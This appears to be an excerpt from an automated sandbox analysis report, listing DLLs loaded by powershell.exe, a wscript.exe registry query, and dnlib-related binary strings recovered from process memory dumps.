Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000006.00000002.1391686254.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ows\dll\System.pdbsv source: powershell.exe, 00000006.00000002.1382179143.000001776F323000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb9 source: powershell.exe, 00000006.00000002.1382179143.000001776F389000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32h source: powershell.exe, 00000006.00000002.1348469263.00000177554C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.1382179143.000001776F389000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000006.00000002.1391686254.00007FFAAC7A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: re.pdb source: powershell.exe, 00000006.00000002.1382179143.000001776F323000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000006.00000002.1364577618.00000177681CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1384950590.000001776F9F0000.00000004.08000000.00040000.00000000.sdmp
